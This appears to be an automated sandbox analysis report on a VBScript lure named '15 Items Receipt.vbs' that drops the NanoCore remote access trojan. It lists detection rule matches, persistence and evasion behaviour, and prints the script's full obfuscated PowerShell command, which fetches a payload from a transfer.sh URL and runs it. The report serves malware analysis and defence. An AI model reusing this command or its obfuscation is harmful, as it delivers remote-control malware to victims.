Source: 00000000.00000003.416548477.0000022F43568000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.417297816.0000022F4356A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.417934002.0000022F45340000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000003.415037568.0000022F45341000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.417252969.0000022F4355A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.416992002.0000022F4348A000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000002.00000002.405872128.00000259CC2EA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: aspnet_compiler.exe PID: 3092, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Users\Public\Run\New.vbs, type: DROPPED	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =

Source: 15 Items Receipt.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\15 Items Receipt.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20210914

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3m0huyh0.ma4.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winVBS@10/10@26/3

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{401b59fa-a7f2-4468-a03b-04e3bc489e18}

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\15 Items Receipt.vbs'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000003.394270405.00000259E35AD000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp
Source:	Binary string: System.pdb source: aspnet_compiler.exe, 00000017.00000003.413706311.00000000012E8000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POwerSheLL $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt", "0", "true");

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe:Zone.Identifier read attributes | delete

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
